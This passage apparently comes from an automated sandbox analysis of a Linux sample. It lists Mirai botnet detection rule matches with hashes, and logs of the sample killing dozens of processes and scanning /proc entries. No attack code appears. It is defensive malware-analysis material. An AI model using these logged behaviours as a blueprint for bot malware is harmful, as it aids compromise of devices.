      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5280.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5275, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1320, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1389, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1809, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1983, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 2048, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 4331, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5025, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5218, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5219, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5271, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5279, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5280, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5309, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5321, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5322, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5323, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5325, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5326, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5337, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5340, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5399, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5401, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5402, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5403, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5404, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5407, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5465, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5466, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5469, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5491, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5495, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5496, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5501, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5502, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5523, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5527, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5538, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5561, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5592, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5595, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5598, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5599, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5600, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5601, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5602, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5603, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5604, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5605, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5606, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5607, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5608, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5609, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5610, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5611, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5612, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5613, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5614, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1320, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1389, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1476, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1601, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1809, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1983, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 2038, result: successfulJump to behavior
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal100.spre.troj.lin@0/4@0/0

      Persistence and Installation Behavior:

      barindex
      Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
      Source: /usr/bin/dbus-daemon (PID: 5309)File: /proc/5309/mountsJump to behavior
      Source: /bin/fusermount (PID: 5324)File: /proc/5324/mountsJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 5325)Reads from proc file: /proc/meminfoJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1582/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2033/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/670/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/793/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/793/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1579/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1612/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/674/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1335/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/796/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/796/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/675/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1334/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1532/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1576/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/676/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/797/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/797/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/677/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/799/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/799/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/910/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/912/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/912/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/759/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/759/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/517/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/918/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/918/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1594/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1349/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/761/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/761/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/884/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/884/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1389/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1983/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2038/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/720/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/720/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1344/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1465/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1586/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/721/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/721/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1860/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1463/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/800/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/800/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/801/fdJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/801/exeJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/847/fd